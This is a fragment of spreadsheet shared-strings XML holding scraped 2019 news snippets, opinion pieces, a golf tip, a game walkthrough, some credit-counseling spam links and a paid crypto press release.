bills and get medical care. Contact Tyler, Texas Consumer Credit Counseling Service at (888) 551-1270 to learn about the many government sponsored programs available to help you get out of debt. http://www.tunesbaby.com/yt/?x=u6s6LEu4v3g https://loopvideos.com/u6s6LEu4v3g https://consumercreditcounselingserviceusa.blogspot.com/p/sandy-utah-consumer-credit-counseling_22.html http://creditcounselingconsumer.home.blog/santa-ana-california-consumer-credit-counseling-service-888-551-1270-2/ http://californiacreditcounseling.video.blog/concord-north-carolina-consumer-credit-counseling-service-888-551-1270/ http://districtofcolumbiacreditcounseling.home.blog/kirkland-washington-consumer-credit-counseling-service-888-551-1270/ via Tyler, Texas Consumer Credit Counseling Service | (888) 551-1270 September 08, 2019 at 03:55PM Copyright © September 08, 2019 at 03:55PM Tags: texas-consumer-credit-counseling-service-888-551-1270 tyler</t>
  </si>
  <si>
    <t>Just saw this article which has some details about the flash sales that Shopback will be having this evening. Each flash sale will be for 30 minutes. Those looking to add new electronics to the home can visit online marketplace eBay where shoppers can expect $5 cash back on all purchases. The cashback offer is in addition to potential savings offered by retailer's on eBay. Lululemon 5pm The Iconic 7pm</t>
  </si>
  <si>
    <t>BBC News - Technology</t>
  </si>
  <si>
    <t>Ismail Ajjawi is admitted after he was controversially blocked based on social media posts, he said. The post Palestinian Harvard student barred from US is allowed in appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Even a well-intentioned golfer with a fundamentally sound swing can send their golf ball careening into trouble on the course thanks to improper hand placement on the golf club. Your hands are your only connection to golf club, which makes the way you hold the club one of the most important aspects of your set-up. Your hands control the clubface and your clubface position controls the direction the ball will travel. Cause, meet effect. So, to help you get your swing off on the right foot, or check-in on your current grip, I’ve put together a step-by-step guide for optimally placing your hands on the golf club. Place (don’t twist) your left hand on the club so that the grip lies diagonally across the palm and fingers with the club handle UNDER THE HEEL PAD of your hand. Close the hand, seeing 1 1/2 to 2 knuckles on the back of your left hand. Allow your left thumb to rest lightly and slightly right of center down the grip shaft. Close the “V” between the left thumb and forefinger. Feel the “pressure” in the last three fingers of the left hand, not in the palm. Place the right hand onto the club snugly against the left (hiding the left thumb with the crease of the palm of your right hand) and interlock, overlap, or use a ten-finger style with your right pinkie. Allow your right thumb to rest lightly and slightly left of center down the grip shaft. Close the “V” between the right thumb and forefinger. Feel the “pressure” in the base of the middle two fingers of the right hand, not in the palm. Your index finger and thumb form a “trigger” or “pinch” hold. Make sure that both “V’s” point to a spot somewhere between your chin and right shoulder, parallel to each other. Coupled with the right pressure (think a five on a scale of one to ten in terms of how tightly you hold the handle of the club), these steps will help you perfect a fundamental element of your swing before you even move the club. Have questions about how to modify how you currently hold the club? Leave them in the comments below. And now that your grip is squared away, be sure to check in on your golf posture. The post Get a Grip! Follow this Guide to Improve Your Hold on the Club appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Alexandra Smith</t>
  </si>
  <si>
    <t>Rebel MPs have not been given one of their key demands in the abortion debate, prompting fears they will defect to the crossbench.</t>
  </si>
  <si>
    <t>The NRL has handed a two-year ban to the spectator who confronted Melbourne centre Will Chambers during last weekend’s game at Brookvale.</t>
  </si>
  <si>
    <t>TIPS Personnel is currently looking for awesome men and women to join our asbestos removal team. We have various different projects happening all around the city of Edmonton, and we are looking for new team members to join us today! Job Description:Workers will be tearing down walls, doors, ceilings etc. and removing asbestos. Requirements:-Fully certified .. Read more</t>
  </si>
  <si>
    <t>Ashleigh McMillan</t>
  </si>
  <si>
    <t>A 35-year-old man will face court on Sunday night over the death of pregnant mother-of-two Helena Broadbent, who fell from a car in Melbourne's north-west on Saturday.</t>
  </si>
  <si>
    <t>Apple Inc's move to offer a free TV+ subscription for a year with every new device may briefly crown the iPhone maker as the biggest streaming service by user numbers, leapfrogging Netflix Inc.</t>
  </si>
  <si>
    <t>Highlights from the 2017 Champagne Henriot Polo by the Sea staged at Hitchcock Park, Palm Beach, NSW, Australia on Saturday 14 January 2017. source The post Palm Beach POLO BY THE SEA 2017 (Highlights) appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Foreman and Wilms go bush for 13 days in a canoe on a wild river with a Jack Russell Terrier. Deep in the woods of Maine the Allagash flows north for 100 miles through large lakes, towering trees and beautiful scenery, a perfect setting for a magnificent adventure. source The post The Allagash Wilderness Waterway. Part 1/4 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Prostate cancer is the most common cancer in men in the UK, and it develops when cells in the prostate start to grow in an uncontrolled way. According to a new study, man who receive a common treatment may be at increased risk of developing condition. Daily Express :: Health Feed</t>
  </si>
  <si>
    <t>Full Replay – Cameroon vs Argentina | 2019 Women’s FIVB World Cup – Cameroon vs Argentina | (W) FIVB – Sep 24, 2019 at 12:48 AM EDT. Sep 24 … The post Cameroon vs Argentina | 2019 Women’s FIVB World Cup appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>People with little or no knowledge of cryptocurrency are the most likely to be positive on its future, according to new research from Dutch bank ING. In a survey published Wednesday – which polled around 1,000 people in each of 15 mostly European countries – ING found that, overall, the level of detailed knowledge about crypto is fairly low. While 74 percent answered correctly that cryptocurrencies are a form of digital money, roughly the same amount (73 percent) said cryptos are run by a centralized body, or didn’t know. A small majority were, however, correct when answering questions on volatility and in-store acceptance. Examining how attitudes vary among the pools of people with varying knowledge of the subject, ING found that the least knowledgeable were the most positive. The report states: “Of the 13% in Europe who could correctly identify one of the five statements as either true or false, and therefore were labelled as having low knowledge, most either had a high (43%) or medium (37%) attitude towards the future of cryptocurrencies. This was almost identical for those who could correctly identify two or three out of the five statements, demonstrating medium knowledge.” Respondents with greater knowledge showed more negative sentiment in the survey, with just 32 percent being positive about the future use of cryptos. “People are wary of cryptocurrencies – a reflection, most probably, of their being new and relatively intricate. The workings of blockchain, the idea of mining for something intangible and storing it in a digital wallet is, after all, novel and unfamiliar for many,” ING said in the report. Of those that knew at least a little about the subject, Turkey was the only nation with a majority of respondents displaying positive attitudes (62 percent). Aside from Romania (44 percent) and Poland (43 percent), most nations had levels of around 30 percent or lower. People were roughly equally split in the survey when asked to respond to statements on crypto’s role as the future of online spending and investment. Thirty-two percent said it is the future of online spending, down from 35 percent in 2018. Thirty-five percent expected the value of cryptocurrencies to rise in the next 12 months. Thumbs up image via Shutterstock; chart via ING</t>
  </si>
  <si>
    <t>by Lowell Here are a few national and Virginia news headlines, political and otherwise, for Monday, September 23. At UN, leaders of a warming world gather (“The planet is getting hotter, and tackling that climate peril will grab the spotlight as world leaders gather for their annual meeting at the United Nations this week.” This is a huge crisis and they need to treat it as such.) U.N. Climate Summit Sets Stage For New National Emissions Promises Climate effort must be boosted five-fold to limit global warming to 1.5°C Countries must triple climate emission cut targets to limit global heating to 2C (“United in Science report ahead of UN summit says climate is changing faster than forecast, and current plans would lead to ‘catastrophic’ global temperature rise” Yep, it turns out the forecasts of the climate crisis’ impact have been far too CONSERVATIVE, if anything.) UN secretary general hails ‘turning point’ in climate crisis fight (“UN secretary general António Guterres said recent action by some countries and businesses, as well as the stunning rise of the youth climate movement, gave him hope that international goals to avoid catastrophic global heating could be met.” The biggest obstacle is Trump and, more broadly, the science-denial Republican Party. Both of them need to be voted out of power at the next opportunity.) China and India must step up on climate change The United Nations is trying to pressure the world into faster action on climate change (“Three things to watch for at the UN Climate Action Summit on Monday.”) Iran Frees Tanker to End Standoff Ahead of U.N. Summit UK says Iran responsible for attack on Saudi oil facilities Give Up Meat (for a Day, at Least) (“Vegetarianism isn’t for everyone. But small changes in diet can mean big gains for the climate.”) The Republican Party is a climate crisis There’s another expert player warming up to online election interference. We should worry. Iran’s Foreign Minister: ‘Abandon The Illusion’ That Tehran Will Cave To Pressure A Year Later, Iran Finds Evaporating Sympathy at the U.N. Boost for Netanyahu as three Arab politicians refuse to back rival (“Israeli president tasked with choosing candidate to form Israel’s next government after inconclusive election”) Boris Johnson: Don’t expect ‘New York breakthrough’ on Brexit (“British PM to meet EU leaders at UN summit, says he is still ‘cautiously optimistic’ about securing a deal.”) Trump suggests he mentioned Biden in call with Ukrainian president This may be the worst Trump scandal yet Trump doubles down on call to investigate Biden after whistleblower complaint: ‘That’s the real story’ (Just remember, when you go to the polls on November 5, that Republicans are giving Trump a free pass to corrupt our government and undermine our democratic institutions.) Ukraine drama could give Democrats no choice but to impeach Trump (“If Trump used his power to try to coerce a foreign leader into influencing US elections, it may precipitate the worst political crisis of this presidency”) Donald Trump vs. the United States of America (“The full picture reveals a man who presents a clear and present danger to the country.”) Trump’s Firing Away on Fifth Avenue, and We Are Fucked (“The president has all but ’fessed up to his latest impeachable offense, and Republicans are shrugging. That’s on them—not the Democrats.” Agreed – it’s overwhelmingly on Republicans.) Why Trump gets away with everything (“But when the greatest threat to our country is the corruption of our constitutional system, might at least some of the GOP’s leading politicians decide that there are worse things than losing a primary, or being upbraided by Fox News?”) Trump’s takeover of GOP leads many House Republicans to head for exits (“Nearly 40 percent of House Republicans have left or lost since President Trump’s inauguration, and some in the GOP say in private that he is the reason.”) Romney: Trump asking Ukraine to investigate political rival ‘would be troubling in the extreme’ (So what’s Romney going to *do* about this?) The Press Is Embracing False Equivalence—Again (“Coverage of the president’s pressure on Ukraine suggests the media learned nothing from 2016”) ‘We’ve been very weak’: House Democrats decry their oversight of President Trump Inside the Trump legal team trying to stop impeachment before it starts Pelosi warns White House over whistleblower complaint (“Pelosi wrote in a rare weekend letter to lawmakers that President Donald Trump would enter ‘a grave new chapter of lawlessness’ if he succeeded in blocking Congress from learning about his reported conversations pressing Ukranian officials to investigate the son of former Vice President Joe Biden, the Democratic frontrunner in the 2020 presidential contest.”) Trump, Unrestrained (“America’s vulnerability is exploited by its president.”) Elizabeth Warren is becoming Trump’s greatest threat Climate Forum Reveals a Democratic Party Remarkably Aligned with Science on Net Zero Emissions (“Almost every Democrat running for president has now talked at length about climate policy. Details differ, but the goals are similar across the spectrum.”) D’Souza compares young climate change activist to Nazi propaganda (Speaking of D’Souza, remember this? Video: Unhinged Extremist, Bigot and Felon Dinesh D’Souza Addresses VA 6th CD GOP Dinner) Corey Lewandowski Wants to Run for Senate. He’s Spent the Last 3 Years in Trump’s Swamp. (Crazy.) 2019 Emmy Awards: ‘Game of Thrones’ and ‘Fleabag’ Win Big, One Last Time Out of “99 House Districts That Will Determine Dems’ Fate” in 2020, Seven Districts Are In Virginia Why Rep. Abigail Spanberger is all in on gun control Video: In HD88 Debate, Far Right-Wing Republican Mark Cole tries to Appeal to…Anyone. Jess Foster Shines Bright Like a Diamond. Photos: Sen. Tim Kaine, Sheila Bynum-Coleman, Ghazala Hashmi In 2017, Virginia was the bellwether of the blue wave: Will it happen again? Suffolk HOD Challenger Clint Jenkins Tells NOVA: “We’re A Team Working to Turn Virginia Blue” Critics Worry A Trump Administration Proposal Could Limit Virginia’s Ability to Help Poor Families How Virginia’s new student loan ombudsman helps borrowers Report: Abortion Rate Drops in Virginia, More than Almost Any Other State Hadwin: Roanoke Gas customers will pay for MVP Arlington schools were named best in Virginia, but a growing chorus of black parents is disrupting that narrative (“The county system is excellent, they say, for wealthy, able-bodied white children. Not so much for others.”) Climate activists plan to block streets on Monday. Here’s what to know. Former WTOP political analyst Mark Plotkin dies at 72 Norfolk touts benefits a casino would bring. But studies show they’re no sure bet. NSU conference includes national speakers, politicians to discuss America’s evolution after 1619 (Bob McDonnell? LOL) John Broderick, James Shaeffer, Daniel Lufkin, John Dever &amp; Gregory DeCinque: Improving college mobility serves students, region (“The Mobility Pass Program allows better access for students between area community colleges and Old Dominion University.”) It’s the first day of fall, but summer isn’t going anywhere (This weather is seriously f’ed up…and of COURSE hotter than normal in a climate changed world.)</t>
  </si>
  <si>
    <t>Bancacy is an innovative and decentralized digital asset class that is establishing a new form of money. Its asset solidification protocol shelters investors from market volatility and price swings, and the BNY token provides users with multiple earning and investment opportunities. Read on below to learn about the platform’s token sale and how it is helping to create a fully independent and immutable form of digital money powered by the blockchain. Bancacy’s public sale of 534.6 million BNY tokens, the native token of the Bancacy platform, was opened on Saturday, September 7, and the project’s funding target was reached within 2 days, raising a total of 6,500 ETH. Early project backers enjoyed discounts of as much as 25% on their investments, and the BNY tokens that were sold represent 54% of the total supply. Marketing and operational costs will be covered by 17% of the total supply, in addition to 23% and 6% of the token supply that were issued in the Initial Exchange Offering and private sale, respectively. About the Project The goal of the Bancacy project is to use proprietary smart contracts to shield crypto market participants from volatility without involving fiat currency, as is standard with stablecoins. These automated smart contracts are audited by Quantstamp the leader in smart contract auditing and security, and they freeze and unfreeze assets in times of low liquidity and volatility. In this way, Bancacy will be able to solve two longstanding issues facing cryptocurrency investors: low trading liquidity, and price volatility. In order to do this, the system uses two native tokens, BNY and XBNY. BNY is a tradable asset, the price of which depends on supply and demand. Holding it can provide returns of up to 12.8% p.a., and the main functionality it provides is that it can be ‘solidified’ or frozen into XBNY, which is like a stablecoin in nature. The Asset Solidification Protocol &amp; ROI Here is how asset solidification works: A user can freeze his or her BNY tokens at any predetermined value at any time, without having to depend on third party authentication to do so. When tokens are frozen, BNY tokens are essentially burnt, and the holder receives a dollar equivalent of XBNY, the stablecoin token. When the user is ready to cash out or reenter the market, they burn their XBNY and mint a dollar equivalent of BNY once again. All of this happens in an automated fashion, at the protocol level, and it shields users from price swings and low liquidity by allowing them to essentially enter or exit the market while keeping the value of their portfolio intact along the way. The ROI that users can earn is also managed by the platform to avoid excess minting of BNY during bear markets. Short, mid, and long-term investments can reap a maximum of 12.8% ROI p.a., depending on the length and number of invested tokens. This is done to moderate inflation. In addition, users can earn passive income by locking his or her tokens for a fixed period of 365 days, earning passive income on a daily basis. Project Roadmap Phase 1 of the Bancacy project was launched on August 31, 2019, which included the launch of the BNY token along with all its functionalities except asset solidification. The platform itself is available for Windows, Linux, and Mac. Phase 2 is currently underway, with Bancacy engineers working on the second and third smart contracts that will enable XBNY’s functionality as a stablecoin by receiving BNY prices from high-tier exchanges on which BNY will be listed in the near future. To eliminate fraudulent price-fixing activity, three daily price samples seven days a week from reputable and trustworthy Oracles will be taken to provide an array of 21 prices that are used to give an approximate 7-day price average that will be used for asset solidification. To learn more, visit https://www.bancacy.com/, or connect with the team on Facebook, Telegram, or Reddit and join the new Digital Money revolution. This is a paid-for submitted press release. CCN does not endorse, nor is responsible for any material included below and isn’t responsible for any damages or losses connected with any products or services mentioned in the press release. CCN urges readers to conduct their own research with due diligence into the company, product or service mentioned in the press release. Last modified (UTC): September 17, 2019 5:53 AM</t>
  </si>
  <si>
    <t>Canada’s men’s basketball team opened the FIBA World Cup with a 108-92 loss to Australia on Sunday in Dongguan, China — and now face a massive task in its goal of advancing out of the preliminary round. CBC | Sports News Canada drops 108-92 decision to Australia in FIBA World Cup opener</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190926/p13#a190926p13 YouTube says it will remove content that violates its guidelines regardless of who said it, including politicians, but will make exceptions depending on context (Julia Alexander/The Verge) Julia Alexander / The Verge: YouTube says it will remove content that violates its guidelines regardless of who said it, including politicians, but will make exceptions depending on context — Context of videos is important, CEO says — YouTube will remove content from politicians using its platform if their content violates … Source: http://www.techmeme.com/190926/p13#a190926p13 The post YouTube says it will remove content that violates its guidelines regardless of who said it, including politicians, but will make exceptions depending on context (Julia Alexander/The Verge) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Pasternak’s devoted wife and beautiful mistress were the muses for his masterpiece, Doctor Zhivago. Now they have inspired a new novel about their love triangle.</t>
  </si>
  <si>
    <t>onhunt</t>
  </si>
  <si>
    <t>Thought I would post this for those buying Lego. Need Qantas money app for these offers. Make purchase via attached Mastercard. There are other offers as well</t>
  </si>
  <si>
    <t>Bianca Andreescu’s meteoric rise in the tennis world over the past season is nothing short of remarkable, and fans at the U.S Open can’t get enough of the 19-year-old from Mississauga, Ont. CBC | Sports News</t>
  </si>
  <si>
    <t>Bill Whitelaw</t>
  </si>
  <si>
    <t>There were days through the spring and summer when thousands of people poured into Calgary’s streets to demonstrate support for Canada’s upstream oil and gas sector. There were placards, posters and T-shirts with slogans. There were chants and speeches. There was undeniable passion. They rallied to support the integrity of Canadian oil and gas – and they were telling politicians (and other Canadians) in no uncertain terms to get with the support program. The key word here is integrity. Rally attendees were telling politicians: Quit screwing up the sector and start supporting its integrity. Do that and you support Canadian prosperity. Integrity and prosperity go hand in hand. So will we pour into the streets to rally in similar fashion to protect the Alberta Energy Regulator’s (AER) integrity – and its critical independence – as it enters a process with potential for political tinkering? The United Conservative Party government has launched its AER review. And it smells to high heaven of craven politicking and agenda setting – including, one might suspect, an effort to slide the AER closer to Alberta Energy, the provincial ministry for most things on the province’s energy landscape. AER’s independence from government isn’t necessarily top of mind for ordinary Albertans. But the regulator’s ability to protect the interests all Albertans, not just those noisy UCP supporters, is in peril. This could rock the foundation of system that has worked marvellously well for decades. Energy Minister Sonya Savage has made much of AER’s alleged growth in staff and the lengthy time it takes to process applications. Those dynamics, she contends, discourage investment and interest in Alberta’s energy industry. But would investors be eager to park capital in a jurisdiction in which the independent regulator approved applications that then resulted in lengthy hearings, and then court action? Those kind of delays can kill projects. Since 2013 when the current AER was formed, has staffing actually grown? And given AER’s recent initiatives in cutting red tape, are application times actually increasing? The Responsible Energy Development Act sets out much of the legislative framework that AER works within and it has a strong focus on stakeholder engagement. Presumably, these are details that will be up to deputy ministers Grant Sprague and Bev Yee, who are leading the review, to ferret out as they delve into details that may not be apparent to politicians. An impartial review might also point to how under-investment has hampered AER’s ability to discharge its responsibilities. In the spirit of fairness – and to avoid the perception of political machinations – it would be a good idea for the review board to get a first-hand demo of the OneStop toolkit. Is there a political agenda at work? That seems logical given the UCP penchant for finding ways of appeasing, even compounding, industry angst. So the review seems impeccably and deliberately timed to be kept off the public radar, since the UCP machine has rolled out a flurry of panels and consultations. That there’s a federal election concurrently running in which Alberta angst will be front and centre also provides a useful veil. All of this, of course, may simply be cover for coming budgetary blades that will cut swiftly and deeply. That’s why Albertans must step up, including those whose daily bread is earned in the energy sector. It might be tempting to vilify AER as playing a part in the woes that have befallen the industry. But quite the opposite is true. And once we get our hydrocarbons to tidewater, the world will want to know that those products come from a jurisdiction that’s well regulated and that the environment is appropriately protected. And that all that happens as the result of a framework safely distanced from political interference. The Canadian Association of Petroleum Producers has survey data that says people around the world prefer Canadian hydrocarbon supplies. And the summer’s rallies featured a common cry: “The world needs more Canada.” That’s true. Canada’s energy sector has much to offer, not least of which is a strong regulatory ethos. But it’s also true that the world expects more of Canada. Independent regulation is the least we can offer. That’s why it’s time to rally again to ensure UCP doesn’t damage an enterprise critical to provincial prosperity. Bill Whitelaw is president and CEO at JuneWarren-Nickle’s Energy Group. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Protecting AER protects Alberta energy industry integrity appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>NSW Nationals have quit the party over the debate abortion, citing concerns over late-term terminations as the key reason.</t>
  </si>
  <si>
    <t>Hello parents!! Licensed &amp; Approved Dayhome in Walkerlake very close by Ellerslie, Charlesworth,Summerside,Aurora. Spot available for Children – 2years to 5 years of age. Subsidy available Nutritious hot meals &amp; snacks based on Canadian Food Guide Safe ,secure ,smoke &amp; pet free environment Theme based activities Fenced backyard for outdoor fun! I have Standard Child .. Read more</t>
  </si>
  <si>
    <t>Max Koslowski</t>
  </si>
  <si>
    <t>Julie Bishop and Christopher Pyne, fronting an inquiry into ministerial standards, were asked to explain whether their new roles were in breach of lobbying rules.</t>
  </si>
  <si>
    <t>BR</t>
  </si>
  <si>
    <t>Image copyright Handout/Wray family Image caption Soldier F is to be charged with the murder of William McKinney and James Wray The case of the Army veteran facing a murder trial over Bloody Sunday is due in court for the first time on Wednesday. Soldier F, now in his 60s, is unlikely to appear in person at Londonderry Magistrates’ Court. Instead, his legal team is expected to challenge the case against him at an initial hearing which will be procedural in nature. Soldier F faces two counts of murder and five of attempted murder. Thirteen people were killed and 15 wounded when members of the Army’s Parachute Regiment opened fire on civil rights demonstrators in Derry on Sunday, 30 January 1972. The day became known as Bloody Sunday. Image copyright PA/Paul Faith Image caption Thousands of people took part in the civil rights march in Derry The Northern Ireland Public Prosecution Service decided in March that Soldier F, as he was known at the Bloody Sunday public inquiry, would be the only ex-paratrooper to be charged. The former soldier was served with a court summons in recent weeks. He is to be charged with murdering James Wray, 22, and William McKinney, 27. The attempted murder charges relate to Joseph Friel, Michael Quinn, Joe Mahon and Patrick O’Donnell. A fifth attempted murder charge – not revealed earlier this year – relates to persons unknown. Relatives of those killed and injured on Bloody Sunday are planning to walk together to the Bishop Street court on Wednesday morning.</t>
  </si>
  <si>
    <t>Clay Lucas</t>
  </si>
  <si>
    <t>One council is considering adding a fifth bin to its recycling collection, as the receivers of SKM reveal what they find in council recycling delivered to them.</t>
  </si>
  <si>
    <t>MPs launch new group to try to secure Brexit deal Original Source LONDON (Reuters) – Several British lawmakers launched a new group on Tuesday to bolster efforts to secure a deal to leave the European Union, hoping to persuade parliament finally to pass an agreement based on one it rejected three times. FILE PHOTO: Britain’s Caroline Flint speaks during the Labour Party’s annual conference in 2014. REUTERS/Suzanne Plunkett/File Photo With the Brexit crisis deepening and parliament suspended, lawmakers are scrambling to find ways to prevent a disruptive no-deal Brexit at the end of October, which they say would hurt businesses, drive up job losses and deepen divides in Britain. They have passed a law to force Prime Minister Boris Johnson to ask for a delay to Brexit if there is no deal, a move he says will tie his hands in talks but one which many lawmakers hope might make him focus on securing an agreement with Brussels. The group of Conservative, Labour and Liberal Democrat lawmakers, called “MPs (members of parliament) for a deal”, said it would try to rally support for an agreement based on one former leader Theresa May had worked on with the opposition Labour Party. Caroline Flint, a Labour lawmaker who previously voted in favour of May’s deal, said the group would use “the hours, the days, the weeks left” before the Brexit deadline of Oct. 31 to show the “sizeable voice” in parliament for a deal. “We are all in support of getting a deal and leaving in an orderly way,” she told a news conference, adding there were about 50 Labour lawmakers who wanted a deal. “We may not be as loud as some voices but we are a voice of reason here.” She said talks between May and Labour had been successful in fleshing out some common ground on Brexit and that the result of those contacts should form a basis for any deal Johnson secures. Stephen Kinnock, another Labour lawmaker, described the group’s job as showing Johnson “that the numbers are there” to get such a deal through parliament. “Our job as MPs for a deal is to work relentlessly over the next few weeks, getting it out there to our colleagues and saying ‘sign this bit of paper which says we will vote for a deal,’” he said. But a spokesman for the prime minister said Johnson was working on making progress in areas which differed from some of the things May had talked about before she resigned. Reporting by Elizabeth Piper; editing by Stephen Addison Our Standards:The Thomson Reuters Trust Principles.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MPs launch new group to try to secure Brexit deal appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Memoirs of the Open Warm-up 10min warm up inc squat prep + glute band lunges pressing prep Back Squat (Weight) E3M x 5: Set 1: 3 @ 50% Set 2: 3 @ 60% Set 3-5: 3 @ 70% *3sec pause on first rep *After each set complete: 30sec Empty barbell OH hold Metcon (AMRAP –... The post WOD WOD, September 10, 2019 appeared first on CrossFit Chamber.</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</si>
  <si>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Video of police beating leads to investigation – CNN Video by USA Consumer Credit Counseling, Felipe Escobar on Sunday 08 September 2019 10:23 PM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Video of police beating leads to investigation – CNN Video Sunday 08 September 2019 09:03 PM UTC-05 | Tags: consumer-credit-counseling-service https://firmadeabogadosmedellin.blogspot.com/p/bloomington-indiana-consumer-credit.html Three Mesa, Arizona, police officers and a sergeant were placed on administrative leave after surveillance video surfaced showing them beating a man during a domestic disturbance call. Tags: Lakewood, California Consumer Credit Counseling Service | (888) 551-1270 via Video of police beating leads to investigation – CNN Video September 08, 2019 at 08:40PM Copyright © September 08, 2019 at 08:40PM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>The big September update of Civilization VI has landed and, although the developers have detailed most of the features of this release, there was still a big surprise: the Royal Battle. Yes, Civ 6 now has an official Royal Battle scenario called Red Death, and in one way or another, it's even more ridiculous than you'd expect. The multiplayer scenario of Red Death is set in a future devastated by nuclear weapons. Your job is to protect the civilian units of enemy players and the titular Red Death – an expanding cloud of deadly radiation that forces you to fight in a shrinking circle of security. The winner is the last player to have a civilian alive. You will choose from different special factions for this scenario, ranging from Doomsday Preppers (which boasts a 100% experience bonus) to Pirates (which suffers 50% less water damage). You get new units by cleaning up the city's ruins or looting camps, and once the Red Death circle begins to shrink, you'll sometimes encounter ammunition with tanks, artillery units, and artillery. nuclear weapons at your disposal. Check it out in the trailer below. You can get a lot more details in the official release notes on Steam. Firaxis employees have recently promised a multiplayer mode "unlike anything we've done before," and have certainly been effective in this regard. The September update also includes a lot of information for the more experienced Civ players. INFO Buy now</t>
  </si>
  <si>
    <t>BBC News - Business</t>
  </si>
  <si>
    <t>The financial assistance fund Boeing set up after the crashes has started accepting claims. The post Boeing to pay bereaved 737 families $144,500 each appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Daina Goldfinger</t>
  </si>
  <si>
    <t>When he was approached by officers, police allege the suspect fled on foot, which started a foot chase through several farm fields.</t>
  </si>
  <si>
    <t>Office-sharing startup WeWork is pressing ahead with plans to go public despite lukewarm interest in its shares, three sources said, leaving its largest investor, SoftBank Group , with a stark choice: take a haircut or pony up even more cash.</t>
  </si>
  <si>
    <t>Ferrari’s Charles Leclerc ended a nine-year drought at the Italian Grand Prix with a masterful drive but the victory has further exposed his teammate Sebastian Vettel.</t>
  </si>
  <si>
    <t>$560K worth of fake NBA championship rings seized at Los Angeles airport Original Source Sept. 11 (UPI) — U.S. Customs and Border Protection seized a wooden box containing 28 fake NBA championship rings during an inspection at Los Angeles International Airport. Customs and Border Protection officials said in a news release Wednesday that the shipment of counterfeit rings were being transported from China to Arizona. Investigators believe the fake rings were intended to be sold as a collection. “Scammers take advantage of collectors and pro basketball fans desiring to obtain a piece of sports history,” Carlos C. Martel, CBP director of field operations in Los Angeles, said. “This seizure illustrates how CBP officers and import specialists protect not only trademarks, but most importantly, the American consumer.” The memorabilia included fake rings from the Chicago Bulls, Los Angeles Lakers, Golden State Warriors, Cleveland Cavaliers, San Antonio Spurs and several other NBA teams, according to the CBP. The rings, if genuine, would have been worth about $560,000. It marked the second major bust involving counterfeit championship rings this year. In April, Customs and Border Protection officials announced it seized a 177-ring shipment from China. The shipment, which included fake New York Yankees World Series rings and Super Bowl rings for the New England Patriots and Philadelphia Eagles, was worth about $12 million, according to TMZ. (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) return;js = d.createElement(s); js.id = id;js.src = ‘https://connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v3.2&amp;appId=130795020312660&amp;autoLogAppEvents=1’;fjs.parentNode.insertBefore(js, fjs);(document, ‘script’, ‘facebook-jssdk’)); window.twttr = (function (d,s,id) (document, “script”, “twitter-wjs”));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$560K worth of fake NBA championship rings seized at Los Angeles airport appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Emma Guiney has sworn off holiday destinations with mosquito-borne diseases. As the climate changes, they will likely be on her doorstep. Such diseases are one of the many health challenges Sydney faces as its population booms in the next decade.</t>
  </si>
  <si>
    <t>Along with the main missions, there are tons of things to do Borderlands 3. One of the smaller deviations are the crew challenges, these are hidden extras on the map that reward you with Eridium and loot. In drought – the first area of the game you track down Typhoon Logs, Dead Claptraps, and pass a Legendary hunt. These are scattered throughout the area, but are not too hard to find once you know where to look. The ultimate goal of your cleanup is to unlock the Typhoon Dead Drop, which appears as a Locked chest if you have not followed the right steps. Borderlands 3 Droughts Typhoon Logs In total, there are three Typhoon newspapers to find in The Droughts. You can only open the safe when you have found all three. The first, just northwest of the Crimson Raiders Fortune Base in The Droughts – we have indicated on the map below: It is at the edge of the ridge overlooking the giant monster spine in the distance. The second is in the middle of a skag nest on the east side of the area. You have to climb on rocks to reach it. The final Typhoon Log is the hardest to access. It can only be achieved during the narrative mission "Take Flight". So play the main missions until you have not done so already. You will find the log overlooking a cliff at the back of the camp where the space navigation chip is located. Once you've found all three, you'll unlock the location of the Typhoon Dead Drop – the locked locker. Borderlands 3 – how to open the locked safe Once you have found the three newspapers, head to the west side of the map shown in the image below: The chest is in the back corner of this sub-area and is guarded by a tough enemy. This is also where you will find a Big Succ quest goal. Borderlands 3 Drought There are two dead friends of Claptrap to eliminate in The Droughts. The first is east of the map on the east side of the Ellie Scrapyard race track: The second is just outside the small area with vending machines and a vehicle point of entry in the northern part of the map: Borderlands 3 Legendary Drought Hunt Finally, you will face Lavender Crawly for your legendary hunt. This is just northwest of Crimson Raiders camp where you start in the area. Watch out for Crawly grenade attacks as they cause a lot of damage. Do not be too complacent when you also remove the first form. When you inflict enough damage, the Crawly will protect himself in a basket and split in two. Once you have beaten these two players, it will divide into four again. Once they are down, claim your loot and Eridium. To learn more about the cool stuff you can do in Borderlands 3, take a look at Easter egg Rick and Morty, the One Punch Man pistol or the Lord of the Rings mission! Or if you're trying to get simple legendary weapons, here's how to get free Golden Keys, as well as free in-game cosmetics.</t>
  </si>
  <si>
    <t>George Cran</t>
  </si>
  <si>
    <t>James McPake says it only took one glance around a dejected dressing-room at Morton to know his Dundee side will have a successful season.</t>
  </si>
  <si>
    <t>P30 PRO is set to receive its biggest Huawei update yet – here is an outline of everything owners of the 2019 flagship can look forward to. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>Chip Patterson</t>
  </si>
  <si>
